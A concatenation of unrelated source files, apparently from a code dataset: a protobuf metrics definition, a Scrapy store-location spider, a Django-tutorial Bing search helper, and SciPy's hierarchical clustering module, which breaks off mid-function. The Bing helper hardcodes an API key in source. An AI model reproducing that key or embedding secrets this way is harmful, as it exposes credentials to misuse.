)
hotel_price_difference_percentage = proto.Field(
proto.DOUBLE, number=214, optional=True
)
hotel_eligible_impressions = proto.Field(
proto.INT64, number=215, optional=True
)
historical_creative_quality_score = proto.Field(
proto.ENUM,
number=80,
enum=quality_score_bucket.QualityScoreBucketEnum.QualityScoreBucket,
)
historical_landing_page_quality_score = proto.Field(
proto.ENUM,
number=81,
enum=quality_score_bucket.QualityScoreBucketEnum.QualityScoreBucket,
)
historical_quality_score = proto.Field(
proto.INT64, number=216, optional=True
)
historical_search_predicted_ctr = proto.Field(
proto.ENUM,
number=83,
enum=quality_score_bucket.QualityScoreBucketEnum.QualityScoreBucket,
)
gmail_forwards = proto.Field(proto.INT64, number=217, optional=True)
gmail_saves = proto.Field(proto.INT64, number=218, optional=True)
gmail_secondary_clicks = proto.Field(proto.INT64, number=219, optional=True)
impressions_from_store_reach = proto.Field(
proto.INT64, number=220, optional=True
)
impressions = proto.Field(proto.INT64, number=221, optional=True)
interaction_rate = proto.Field(proto.DOUBLE, number=222, optional=True)
interactions = proto.Field(proto.INT64, number=223, optional=True)
interaction_event_types = proto.RepeatedField(
proto.ENUM,
number=100,
enum=interaction_event_type.InteractionEventTypeEnum.InteractionEventType,
)
invalid_click_rate = proto.Field(proto.DOUBLE, number=224, optional=True)
invalid_clicks = proto.Field(proto.INT64, number=225, optional=True)
message_chats = proto.Field(proto.INT64, number=226, optional=True)
message_impressions = proto.Field(proto.INT64, number=227, optional=True)
message_chat_rate = proto.Field(proto.DOUBLE, number=228, optional=True)
mobile_friendly_clicks_percentage = proto.Field(
proto.DOUBLE, number=229, optional=True
)
organic_clicks = proto.Field(proto.INT64, number=230, optional=True)
organic_clicks_per_query = proto.Field(
proto.DOUBLE, number=231, optional=True
)
organic_impressions = proto.Field(proto.INT64, number=232, optional=True)
organic_impressions_per_query = proto.Field(
proto.DOUBLE, number=233, optional=True
)
organic_queries = proto.Field(proto.INT64, number=234, optional=True)
percent_new_visitors = proto.Field(proto.DOUBLE, number=235, optional=True)
phone_calls = proto.Field(proto.INT64, number=236, optional=True)
phone_impressions = proto.Field(proto.INT64, number=237, optional=True)
phone_through_rate = proto.Field(proto.DOUBLE, number=238, optional=True)
relative_ctr = proto.Field(proto.DOUBLE, number=239, optional=True)
search_absolute_top_impression_share = proto.Field(
proto.DOUBLE, number=136, optional=True
)
search_budget_lost_absolute_top_impression_share = proto.Field(
proto.DOUBLE, number=137, optional=True
)
search_budget_lost_impression_share = proto.Field(
proto.DOUBLE, number=138, optional=True
)
search_budget_lost_top_impression_share = proto.Field(
proto.DOUBLE, number=139, optional=True
)
search_click_share = proto.Field(proto.DOUBLE, number=140, optional=True)
search_exact_match_impression_share = proto.Field(
proto.DOUBLE, number=141, optional=True
)
search_impression_share = proto.Field(
proto.DOUBLE, number=142, optional=True
)
search_rank_lost_absolute_top_impression_share = proto.Field(
proto.DOUBLE, number=143, optional=True
)
search_rank_lost_impression_share = proto.Field(
proto.DOUBLE, number=144, optional=True
)
search_rank_lost_top_impression_share = proto.Field(
proto.DOUBLE, number=145, optional=True
)
search_top_impression_share = proto.Field(
proto.DOUBLE, number=146, optional=True
)
speed_score = proto.Field(proto.INT64, number=147, optional=True)
top_impression_percentage = proto.Field(
proto.DOUBLE, number=148, optional=True
)
valid_accelerated_mobile_pages_clicks_percentage = proto.Field(
proto.DOUBLE, number=149, optional=True
)
value_per_all_conversions = proto.Field(
proto.DOUBLE, number=150, optional=True
)
value_per_all_conversions_by_conversion_date = proto.Field(
proto.DOUBLE, number=244, optional=True
)
value_per_conversion = proto.Field(proto.DOUBLE, number=151, optional=True)
value_per_conversions_by_conversion_date = proto.Field(
proto.DOUBLE, number=245, optional=True
)
value_per_current_model_attributed_conversion = proto.Field(
proto.DOUBLE, number=152, optional=True
)
video_quartile_p100_rate = proto.Field(
proto.DOUBLE, number=132, optional=True
)
video_quartile_p25_rate = proto.Field(
proto.DOUBLE, number=133, optional=True
)
video_quartile_p50_rate = proto.Field(
proto.DOUBLE, number=134, optional=True
)
video_quartile_p75_rate = proto.Field(
proto.DOUBLE, number=135, optional=True
)
video_view_rate = proto.Field(proto.DOUBLE, number=153, optional=True)
video_views = proto.Field(proto.INT64, number=154, optional=True)
view_through_conversions = proto.Field(
proto.INT64, number=155, optional=True
)
__all__ = tuple(sorted(__protobuf__.manifest))
| apache-2.0 | 7,806,873,479,053,634,000 | 47.843607 | 126 | 0.65375 | false |
iandees/all-the-places | locations/spiders/aubonpain.py | 1 | 2580 | import scrapy
import re
import json
from locations.items import GeojsonPointItem
from locations.hours import OpeningHours
class AuBonPainSpider(scrapy.Spider):
name = "aubonpain"
download_delay = 0.5
allowed_domains = [
"www.aubonpain.com",
]
start_urls = (
'https://www.aubonpain.com/stores/all-stores',
)
def parse_hours(self, items):
opening_hours = OpeningHours()
for day in items:
open_time = day["Open"]
close_time = day["Close"]
if close_time == 'Closed' or open_time == 'Closed':
continue
elif close_time == 'Open 24 Hrs' or open_time == 'Open 24 Hrs':
open_time = '12:00 AM'
close_time = '12:00 AM'
elif close_time == 'Open for Special Events':
continue
opening_hours.add_range(day=day["Day"][:2],
open_time=open_time,
close_time=close_time,
time_format='%I:%M %p')
return opening_hours.as_opening_hours()
def parse_store(self, response):
ref = re.findall(r"[^(\/)]+$", response.url)[0]
scripts = "".join(response.xpath('//script/text()').extract())
lat, lon = re.search(r'.*Microsoft.Maps.Location\(([0-9.-]*),\s+([0-9-.]*)\).*', scripts).groups()
address1, address2 = response.xpath('//dt[contains(text(), "Address")]/following-sibling::dd/text()').extract()
city, state, zipcode = re.search(r'^(.*),\s+([a-z]{2})\s+([0-9]+)$', address2.strip(), re.IGNORECASE).groups()
properties = {
'addr_full': address1.strip(', '),
'phone': response.xpath('//dt[contains(text(), "Phone")]/following-sibling::dd/a/text()').extract_first(),
'city': city,
'state': state,
'postcode': zipcode,
'ref': ref,
'website': response.url,
'lat': float(lat),
'lon': float(lon),
}
hours = json.loads(re.search(r'.*var\shours\s*=\s*(.*?);.*', scripts).groups()[0])
hours = self.parse_hours(hours)
if hours:
properties['opening_hours'] = hours
yield GeojsonPointItem(**properties)
def parse(self, response):
urls = response.xpath('//section/div/div//a[contains(@href, "stores")]/@href').extract()
for url in urls:
url = url.replace('\r\n', '')
yield scrapy.Request(response.urljoin(url), callback=self.parse_store)
| mit | -4,718,689,655,118,514,000 | 35.857143 | 119 | 0.527907 | false |
douglasbgatti/rango-tutorial | tango_with_django_project/rango/bing_search.py | 1 | 2360 | import json
import urllib, urllib2
BING_API_KEY = '6uAUnyT0WuPBRqv5+AZIuWrpNsKJ++t0E9Sp9DDkh3Q'
def run_query(search_terms):
# Specify the base
root_url = 'https://api.datamarket.azure.com/Bing/Search/v1/'
source = 'Web'
# Specify how many results we wish to be returned per page.
# Offset specifies where in the results list to start from.
# With results_per_page = 10 and offset = 11, this would start from page 2.
results_per_page = 10
offset = 11
# Wrap quotes around our query terms as required by the Bing API.
# The query we will then use is stored within variable query.
query = "'{0}'".format(search_terms)
query = urllib.quote(query)
# Construct the latter part of our request's URL.
# Sets the format of the response to JSON and sets other properties.
search_url = "{0}{1}?$format=json&$top={2}&$skip={3}&Query={4}".format(
root_url,
source,
results_per_page,
offset,
query)
# Setup authentication with the Bing servers.
# The username MUST be a blank string, and put in your API key!
username = ''
# Create a 'password manager' which handles authentication for us.
password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
password_mgr.add_password(None, search_url, username, BING_API_KEY)
# Create our results list which we'll populate.
results = []
try:
# Prepare for connecting to Bing's servers.
handler = urllib2.HTTPBasicAuthHandler(password_mgr)
opener = urllib2.build_opener(handler)
urllib2.install_opener(opener)
# Connect to the server and read the response generated.
response = urllib2.urlopen(search_url).read()
# Convert the string response to a Python dictionary object.
json_response = json.loads(response)
# Loop through each page returned, populating out results list.
for result in json_response['d']['results']:
results.append({
'title': result['Title'],
'link': result['Url'],
'summary': result['Description']})
# Catch a URLError exception - something went wrong when connecting!
except urllib2.URLError, e:
print "Error when querying the Bing API: ", e
# Return the list of results to the calling function.
return results | apache-2.0 | 702,510,726,307,883,600 | 34.238806 | 79 | 0.659322 | false |
njwilson23/scipy | scipy/cluster/hierarchy.py | 1 | 91969 | """
========================================================
Hierarchical clustering (:mod:`scipy.cluster.hierarchy`)
========================================================
.. currentmodule:: scipy.cluster.hierarchy
These functions cut hierarchical clusterings into flat clusterings
or find the roots of the forest formed by a cut by providing the flat
cluster ids of each observation.
.. autosummary::
:toctree: generated/
fcluster
fclusterdata
leaders
These are routines for agglomerative clustering.
.. autosummary::
:toctree: generated/
linkage
single
complete
average
weighted
centroid
median
ward
These routines compute statistics on hierarchies.
.. autosummary::
:toctree: generated/
cophenet
from_mlab_linkage
inconsistent
maxinconsts
maxdists
maxRstat
to_mlab_linkage
Routines for visualizing flat clusters.
.. autosummary::
:toctree: generated/
dendrogram
These are data structures and routines for representing hierarchies as
tree objects.
.. autosummary::
:toctree: generated/
ClusterNode
leaves_list
to_tree
These are predicates for checking the validity of linkage and
inconsistency matrices as well as for checking isomorphism of two
flat cluster assignments.
.. autosummary::
:toctree: generated/
is_valid_im
is_valid_linkage
is_isomorphic
is_monotonic
correspond
num_obs_linkage
Utility routines for plotting:
.. autosummary::
:toctree: generated/
set_link_color_palette
References
----------
.. [1] "Statistics toolbox." API Reference Documentation. The MathWorks.
http://www.mathworks.com/access/helpdesk/help/toolbox/stats/.
Accessed October 1, 2007.
.. [2] "Hierarchical clustering." API Reference Documentation.
The Wolfram Research, Inc.
http://reference.wolfram.com/mathematica/HierarchicalClustering/tutorial/
HierarchicalClustering.html.
Accessed October 1, 2007.
.. [3] Gower, JC and Ross, GJS. "Minimum Spanning Trees and Single Linkage
Cluster Analysis." Applied Statistics. 18(1): pp. 54--64. 1969.
.. [4] Ward Jr, JH. "Hierarchical grouping to optimize an objective
function." Journal of the American Statistical Association. 58(301):
pp. 236--44. 1963.
.. [5] Johnson, SC. "Hierarchical clustering schemes." Psychometrika.
32(2): pp. 241--54. 1966.
.. [6] Sneath, PH and Sokal, RR. "Numerical taxonomy." Nature. 193: pp.
855--60. 1962.
.. [7] Batagelj, V. "Comparing resemblance measures." Journal of
Classification. 12: pp. 73--90. 1995.
.. [8] Sokal, RR and Michener, CD. "A statistical method for evaluating
systematic relationships." Scientific Bulletins. 38(22):
pp. 1409--38. 1958.
.. [9] Edelbrock, C. "Mixture model tests of hierarchical clustering
algorithms: the problem of classifying everybody." Multivariate
Behavioral Research. 14: pp. 367--84. 1979.
.. [10] Jain, A., and Dubes, R., "Algorithms for Clustering Data."
Prentice-Hall. Englewood Cliffs, NJ. 1988.
.. [11] Fisher, RA "The use of multiple measurements in taxonomic
problems." Annals of Eugenics, 7(2): 179-188. 1936
* MATLAB and MathWorks are registered trademarks of The MathWorks, Inc.
* Mathematica is a registered trademark of The Wolfram Research, Inc.
"""
from __future__ import division, print_function, absolute_import
# Copyright (C) Damian Eads, 2007-2008. New BSD License.
# hierarchy.py (derived from cluster.py, http://scipy-cluster.googlecode.com)
#
# Author: Damian Eads
# Date: September 22, 2007
#
# Copyright (c) 2007, 2008, Damian Eads
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# - Redistributions of source code must retain the above
# copyright notice, this list of conditions and the
# following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# - Neither the name of the author nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import warnings
import numpy as np
from . import _hierarchy
import scipy.spatial.distance as distance
from scipy._lib.six import string_types
from scipy._lib.six import xrange
_cpy_non_euclid_methods = {'single': 0, 'complete': 1, 'average': 2,
'weighted': 6}
_cpy_euclid_methods = {'centroid': 3, 'median': 4, 'ward': 5}
_cpy_linkage_methods = set(_cpy_non_euclid_methods.keys()).union(
set(_cpy_euclid_methods.keys()))
__all__ = ['ClusterNode', 'average', 'centroid', 'complete', 'cophenet',
'correspond', 'dendrogram', 'fcluster', 'fclusterdata',
'from_mlab_linkage', 'inconsistent', 'is_isomorphic',
'is_monotonic', 'is_valid_im', 'is_valid_linkage', 'leaders',
'leaves_list', 'linkage', 'maxRstat', 'maxdists', 'maxinconsts',
'median', 'num_obs_linkage', 'set_link_color_palette', 'single',
'to_mlab_linkage', 'to_tree', 'ward', 'weighted', 'distance']
def _warning(s):
warnings.warn('scipy.cluster: %s' % s, stacklevel=3)
def _copy_array_if_base_present(a):
"""
Copies the array if its base points to a parent array.
"""
if a.base is not None:
return a.copy()
elif np.issubsctype(a, np.float32):
return np.array(a, dtype=np.double)
else:
return a
def _copy_arrays_if_base_present(T):
"""
Accepts a tuple of arrays T. Copies the array T[i] if its base array
points to an actual array. Otherwise, the reference is just copied.
This is useful if the arrays are being passed to a C function that
does not do proper striding.
"""
l = [_copy_array_if_base_present(a) for a in T]
return l
def _randdm(pnts):
""" Generates a random distance matrix stored in condensed form. A
pnts * (pnts - 1) / 2 sized vector is returned.
"""
if pnts >= 2:
D = np.random.rand(pnts * (pnts - 1) / 2)
else:
raise ValueError("The number of points in the distance matrix "
"must be at least 2.")
return D
def single(y):
"""
Performs single/min/nearest linkage on the condensed distance matrix ``y``
Parameters
----------
y : ndarray
The upper triangular of the distance matrix. The result of
``pdist`` is returned in this form.
Returns
-------
Z : ndarray
The linkage matrix.
See Also
--------
linkage: for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='single', metric='euclidean')
def complete(y):
"""
Performs complete/max/farthest point linkage on a condensed distance matrix
Parameters
----------
y : ndarray
The upper triangular of the distance matrix. The result of
``pdist`` is returned in this form.
Returns
-------
Z : ndarray
A linkage matrix containing the hierarchical clustering. See
the ``linkage`` function documentation for more information
on its structure.
See Also
--------
linkage
"""
return linkage(y, method='complete', metric='euclidean')
def average(y):
"""
Performs average/UPGMA linkage on a condensed distance matrix
Parameters
----------
y : ndarray
The upper triangular of the distance matrix. The result of
``pdist`` is returned in this form.
Returns
-------
Z : ndarray
A linkage matrix containing the hierarchical clustering. See
the ``linkage`` function documentation for more information
on its structure.
See Also
--------
linkage: for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='average', metric='euclidean')
def weighted(y):
"""
Performs weighted/WPGMA linkage on the condensed distance matrix.
See ``linkage`` for more information on the return
structure and algorithm.
Parameters
----------
y : ndarray
The upper triangular of the distance matrix. The result of
``pdist`` is returned in this form.
Returns
-------
Z : ndarray
A linkage matrix containing the hierarchical clustering. See
the ``linkage`` function documentation for more information
on its structure.
See Also
--------
linkage : for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='weighted', metric='euclidean')
def centroid(y):
"""
Performs centroid/UPGMC linkage.
See ``linkage`` for more information on the return structure
and algorithm.
The following are common calling conventions:
1. ``Z = centroid(y)``
Performs centroid/UPGMC linkage on the condensed distance
matrix ``y``. See ``linkage`` for more information on the return
structure and algorithm.
2. ``Z = centroid(X)``
Performs centroid/UPGMC linkage on the observation matrix ``X``
using Euclidean distance as the distance metric. See ``linkage``
for more information on the return structure and algorithm.
Parameters
----------
y : ndarray
A condensed or redundant distance matrix. A condensed
distance matrix is a flat array containing the upper
triangular of the distance matrix. This is the form that
``pdist`` returns. Alternatively, a collection of
m observation vectors in n dimensions may be passed as
a m by n array.
Returns
-------
Z : ndarray
A linkage matrix containing the hierarchical clustering. See
the ``linkage`` function documentation for more information
on its structure.
See Also
--------
linkage: for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='centroid', metric='euclidean')
def median(y):
"""
Performs median/WPGMC linkage.
See ``linkage`` for more information on the return structure
and algorithm.
The following are common calling conventions:
1. ``Z = median(y)``
Performs median/WPGMC linkage on the condensed distance matrix
``y``. See ``linkage`` for more information on the return
structure and algorithm.
2. ``Z = median(X)``
Performs median/WPGMC linkage on the observation matrix ``X``
using Euclidean distance as the distance metric. See linkage
for more information on the return structure and algorithm.
Parameters
----------
y : ndarray
A condensed or redundant distance matrix. A condensed
distance matrix is a flat array containing the upper
triangular of the distance matrix. This is the form that
``pdist`` returns. Alternatively, a collection of
m observation vectors in n dimensions may be passed as
a m by n array.
Returns
-------
Z : ndarray
The hierarchical clustering encoded as a linkage matrix.
See Also
--------
linkage: for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='median', metric='euclidean')
def ward(y):
"""
Performs Ward's linkage on a condensed or redundant distance matrix.
See linkage for more information on the return structure
and algorithm.
The following are common calling conventions:
1. ``Z = ward(y)``
Performs Ward's linkage on the condensed distance matrix ``Z``. See
linkage for more information on the return structure and
algorithm.
2. ``Z = ward(X)``
Performs Ward's linkage on the observation matrix ``X`` using
Euclidean distance as the distance metric. See linkage for more
information on the return structure and algorithm.
Parameters
----------
y : ndarray
A condensed or redundant distance matrix. A condensed
distance matrix is a flat array containing the upper
triangular of the distance matrix. This is the form that
``pdist`` returns. Alternatively, a collection of
m observation vectors in n dimensions may be passed as
a m by n array.
Returns
-------
Z : ndarray
The hierarchical clustering encoded as a linkage matrix.
See Also
--------
linkage: for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='ward', metric='euclidean')
def linkage(y, method='single', metric='euclidean'):
"""
Performs hierarchical/agglomerative clustering on the condensed
distance matrix y.
y must be a :math:`{n \\choose 2}` sized
vector where n is the number of original observations paired
in the distance matrix. The behavior of this function is very
similar to the MATLAB linkage function.
An :math:`(n-1)` by 4 matrix ``Z`` is returned. At the
:math:`i`-th iteration, clusters with indices ``Z[i, 0]`` and
``Z[i, 1]`` are combined to form cluster :math:`n + i`. A
cluster with an index less than :math:`n` corresponds to one of
the :math:`n` original observations. The distance between
clusters ``Z[i, 0]`` and ``Z[i, 1]`` is given by ``Z[i, 2]``. The
fourth value ``Z[i, 3]`` represents the number of original
observations in the newly formed cluster.
The following linkage methods are used to compute the distance
:math:`d(s, t)` between two clusters :math:`s` and
:math:`t`. The algorithm begins with a forest of clusters that
have yet to be used in the hierarchy being formed. When two
clusters :math:`s` and :math:`t` from this forest are combined
into a single cluster :math:`u`, :math:`s` and :math:`t` are
removed from the forest, and :math:`u` is added to the
forest. When only one cluster remains in the forest, the algorithm
stops, and this cluster becomes the root.
A distance matrix is maintained at each iteration. The ``d[i,j]``
entry corresponds to the distance between cluster :math:`i` and
:math:`j` in the original forest.
At each iteration, the algorithm must update the distance matrix
to reflect the distance of the newly formed cluster u with the
remaining clusters in the forest.
Suppose there are :math:`|u|` original observations
:math:`u[0], \\ldots, u[|u|-1]` in cluster :math:`u` and
:math:`|v|` original objects :math:`v[0], \\ldots, v[|v|-1]` in
cluster :math:`v`. Recall :math:`s` and :math:`t` are
combined to form cluster :math:`u`. Let :math:`v` be any
remaining cluster in the forest that is not :math:`u`.
The following are methods for calculating the distance between the
newly formed cluster :math:`u` and each :math:`v`.
* method='single' assigns
.. math::
d(u,v) = \\min(dist(u[i],v[j]))
for all points :math:`i` in cluster :math:`u` and
:math:`j` in cluster :math:`v`. This is also known as the
Nearest Point Algorithm.
* method='complete' assigns
.. math::
d(u, v) = \\max(dist(u[i],v[j]))
for all points :math:`i` in cluster u and :math:`j` in
cluster :math:`v`. This is also known by the Farthest Point
Algorithm or Voor Hees Algorithm.
* method='average' assigns
.. math::
d(u,v) = \\sum_{ij} \\frac{d(u[i], v[j])}
{(|u|*|v|)}
for all points :math:`i` and :math:`j` where :math:`|u|`
and :math:`|v|` are the cardinalities of clusters :math:`u`
and :math:`v`, respectively. This is also called the UPGMA
algorithm.
* method='weighted' assigns
.. math::
d(u,v) = (dist(s,v) + dist(t,v))/2
where cluster u was formed with cluster s and t and v
is a remaining cluster in the forest. (also called WPGMA)
* method='centroid' assigns
.. math::
dist(s,t) = ||c_s-c_t||_2
where :math:`c_s` and :math:`c_t` are the centroids of
clusters :math:`s` and :math:`t`, respectively. When two
clusters :math:`s` and :math:`t` are combined into a new
cluster :math:`u`, the new centroid is computed over all the
original objects in clusters :math:`s` and :math:`t`. The
distance then becomes the Euclidean distance between the
centroid of :math:`u` and the centroid of a remaining cluster
:math:`v` in the forest. This is also known as the UPGMC
algorithm.
* method='median' assigns :math:`d(s,t)` like the ``centroid``
method. When two clusters :math:`s` and :math:`t` are combined
into a new cluster :math:`u`, the average of centroids s and t
give the new centroid :math:`u`. This is also known as the
WPGMC algorithm.
* method='ward' uses the Ward variance minimization algorithm.
The new entry :math:`d(u,v)` is computed as follows,
.. math::
d(u,v) = \\sqrt{\\frac{|v|+|s|}
{T}d(v,s)^2
+ \\frac{|v|+|t|}
{T}d(v,t)^2
- \\frac{|v|}
{T}d(s,t)^2}
where :math:`u` is the newly joined cluster consisting of
clusters :math:`s` and :math:`t`, :math:`v` is an unused
cluster in the forest, :math:`T=|v|+|s|+|t|`, and
:math:`|*|` is the cardinality of its argument. This is also
known as the incremental algorithm.
Warning: When the minimum distance pair in the forest is chosen, there
may be two or more pairs with the same minimum distance. This
implementation may chose a different minimum than the MATLAB
version.
Parameters
----------
y : ndarray
A condensed or redundant distance matrix. A condensed distance matrix
is a flat array containing the upper triangular of the distance matrix.
This is the form that ``pdist`` returns. Alternatively, a collection of
:math:`m` observation vectors in n dimensions may be passed as an
:math:`m` by :math:`n` array.
method : str, optional
The linkage algorithm to use. See the ``Linkage Methods`` section below
for full descriptions.
metric : str or function, optional
The distance metric to use in the case that y is a collection of
observation vectors; ignored otherwise. See the ``distance.pdist``
function for a list of valid distance metrics. A custom distance
function can also be used. See the ``distance.pdist`` function for
details.
Returns
-------
Z : ndarray
The hierarchical clustering encoded as a linkage matrix.
"""
if not isinstance(method, string_types):
raise TypeError("Argument 'method' must be a string.")
y = _convert_to_double(np.asarray(y, order='c'))
s = y.shape
if len(s) == 1:
distance.is_valid_y(y, throw=True, name='y')
d = distance.num_obs_y(y)
if method not in _cpy_non_euclid_methods:
raise ValueError("Valid methods when the raw observations are "
"omitted are 'single', 'complete', 'weighted', "
"and 'average'.")
# Since the C code does not support striding using strides.
[y] = _copy_arrays_if_base_present([y])
Z = np.zeros((d - 1, 4))
if method == 'single':
_hierarchy.slink(y, Z, int(d))
else:
_hierarchy.linkage(y, Z, int(d),
int(_cpy_non_euclid_methods[method]))
elif len(s) == 2:
X = y
n = s[0]
if method not in _cpy_linkage_methods:
raise ValueError('Invalid method: %s' % method)
if method in _cpy_non_euclid_methods:
dm = distance.pdist(X, metric)
Z = np.zeros((n - 1, 4))
if method == 'single':
_hierarchy.slink(dm, Z, n)
else:
_hierarchy.linkage(dm, Z, n,
int(_cpy_non_euclid_methods[method]))
elif method in _cpy_euclid_methods:
if metric != 'euclidean':
raise ValueError(("Method '%s' requires the distance metric "
"to be euclidean") % method)
dm = distance.pdist(X, metric)
Z = np.zeros((n - 1, 4))
_hierarchy.linkage(dm, Z, n,
int(_cpy_euclid_methods[method]))
return Z
class ClusterNode:
"""
A tree node class for representing a cluster.
Leaf nodes correspond to original observations, while non-leaf nodes
correspond to non-singleton clusters.
The to_tree function converts a matrix returned by the linkage
function into an easy-to-use tree representation.
See Also
--------
to_tree : for converting a linkage matrix ``Z`` into a tree object.
"""
def __init__(self, id, left=None, right=None, dist=0, count=1):
if id < 0:
raise ValueError('The id must be non-negative.')
if dist < 0:
raise ValueError('The distance must be non-negative.')
if (left is None and right is not None) or \
(left is not None and right is None):
raise ValueError('Only full or proper binary trees are permitted.'
' This node has one child.')
if count < 1:
raise ValueError('A cluster must contain at least one original '
'observation.')
self.id = id
self.left = left
self.right = right
self.dist = dist
if self.left is None:
self.count = count
else:
self.count = left.count + right.count
def get_id(self):
"""
The identifier of the target node.
For ``0 <= i < n``, `i` corresponds to original observation i.
For ``n <= i < 2n-1``, `i` corresponds to non-singleton cluster formed
at iteration ``i-n``.
Returns
-------
id : int
The identifier of the target node.
"""
return self.id
def get_count(self):
"""
The number of leaf nodes (original observations) belonging to
the cluster node nd. If the target node is a leaf, 1 is
returned.
Returns
-------
get_count : int
The number of leaf nodes below the target node.
"""
return self.count
def get_left(self):
"""
Return a reference to the left child tree object.
Returns
-------
left : ClusterNode
The left child of the target node. If the node is a leaf,
None is returned.
"""
return self.left
def get_right(self):
"""
Returns a reference to the right child tree object.
Returns
-------
right : ClusterNode
The left child of the target node. If the node is a leaf,
None is returned.
"""
return self.right
def is_leaf(self):
"""
Returns True if the target node is a leaf.
Returns
-------
leafness : bool
True if the target node is a leaf node.
"""
return self.left is None
def pre_order(self, func=(lambda x: x.id)):
"""
Performs pre-order traversal without recursive function calls.
When a leaf node is first encountered, ``func`` is called with
the leaf node as its argument, and its result is appended to
the list.
For example, the statement::
ids = root.pre_order(lambda x: x.id)
returns a list of the node ids corresponding to the leaf nodes
of the tree as they appear from left to right.
Parameters
----------
func : function
Applied to each leaf ClusterNode object in the pre-order traversal.
Given the i'th leaf node in the pre-ordeR traversal ``n[i]``, the
result of func(n[i]) is stored in L[i]. If not provided, the index
of the original observation to which the node corresponds is used.
Returns
-------
L : list
The pre-order traversal.
"""
# Do a preorder traversal, caching the result. To avoid having to do
# recursion, we'll store the previous index we've visited in a vector.
n = self.count
curNode = [None] * (2 * n)
lvisited = set()
rvisited = set()
curNode[0] = self
k = 0
preorder = []
while k >= 0:
nd = curNode[k]
ndid = nd.id
if nd.is_leaf():
preorder.append(func(nd))
k = k - 1
else:
if ndid not in lvisited:
curNode[k + 1] = nd.left
lvisited.add(ndid)
k = k + 1
elif ndid not in rvisited:
curNode[k + 1] = nd.right
rvisited.add(ndid)
k = k + 1
# If we've visited the left and right of this non-leaf
# node already, go up in the tree.
else:
k = k - 1
return preorder
_cnode_bare = ClusterNode(0)
_cnode_type = type(ClusterNode)
def to_tree(Z, rd=False):
"""
Converts a hierarchical clustering encoded in the matrix ``Z`` (by
linkage) into an easy-to-use tree object.
The reference r to the root ClusterNode object is returned.
Each ClusterNode object has a left, right, dist, id, and count
attribute. The left and right attributes point to ClusterNode objects
that were combined to generate the cluster. If both are None then
the ClusterNode object is a leaf node, its count must be 1, and its
distance is meaningless but set to 0.
Note: This function is provided for the convenience of the library
user. ClusterNodes are not used as input to any of the functions in this
library.
Parameters
----------
Z : ndarray
The linkage matrix in proper form (see the ``linkage``
function documentation).
rd : bool, optional
When False, a reference to the root ClusterNode object is
returned. Otherwise, a tuple (r,d) is returned. ``r`` is a
reference to the root node while ``d`` is a dictionary
mapping cluster ids to ClusterNode references. If a cluster id is
less than n, then it corresponds to a singleton cluster
(leaf node). See ``linkage`` for more information on the
assignment of cluster ids to clusters.
Returns
-------
L : list
The pre-order traversal.
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
# The number of original objects is equal to the number of rows minus
# 1.
n = Z.shape[0] + 1
# Create a list full of None's to store the node objects
d = [None] * (n * 2 - 1)
# Create the nodes corresponding to the n original objects.
for i in xrange(0, n):
d[i] = ClusterNode(i)
nd = None
for i in xrange(0, n - 1):
fi = int(Z[i, 0])
fj = int(Z[i, 1])
if fi > i + n:
raise ValueError(('Corrupt matrix Z. Index to derivative cluster '
'is used before it is formed. See row %d, '
'column 0') % fi)
if fj > i + n:
raise ValueError(('Corrupt matrix Z. Index to derivative cluster '
'is used before it is formed. See row %d, '
'column 1') % fj)
nd = ClusterNode(i + n, d[fi], d[fj], Z[i, 2])
# ^ id ^ left ^ right ^ dist
if Z[i, 3] != nd.count:
raise ValueError(('Corrupt matrix Z. The count Z[%d,3] is '
'incorrect.') % i)
d[n + i] = nd
if rd:
return (nd, d)
else:
return nd
def _convert_to_bool(X):
if X.dtype != bool:
X = X.astype(bool)
if not X.flags.contiguous:
X = X.copy()
return X
def _convert_to_double(X):
if X.dtype != np.double:
X = X.astype(np.double)
if not X.flags.contiguous:
X = X.copy()
return X
def cophenet(Z, Y=None):
"""
Calculates the cophenetic distances between each observation in
the hierarchical clustering defined by the linkage ``Z``.
Suppose ``p`` and ``q`` are original observations in
disjoint clusters ``s`` and ``t``, respectively and
``s`` and ``t`` are joined by a direct parent cluster
``u``. The cophenetic distance between observations
``i`` and ``j`` is simply the distance between
clusters ``s`` and ``t``.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded as an array
(see ``linkage`` function).
Y : ndarray (optional)
Calculates the cophenetic correlation coefficient ``c`` of a
hierarchical clustering defined by the linkage matrix `Z`
of a set of :math:`n` observations in :math:`m`
dimensions. `Y` is the condensed distance matrix from which
`Z` was generated.
Returns
-------
c : ndarray
The cophentic correlation distance (if ``y`` is passed).
d : ndarray
The cophenetic distance matrix in condensed form. The
:math:`ij` th entry is the cophenetic distance between
original observations :math:`i` and :math:`j`.
"""
Z = np.asarray(Z, order='c')
is_valid_linkage(Z, throw=True, name='Z')
Zs = Z.shape
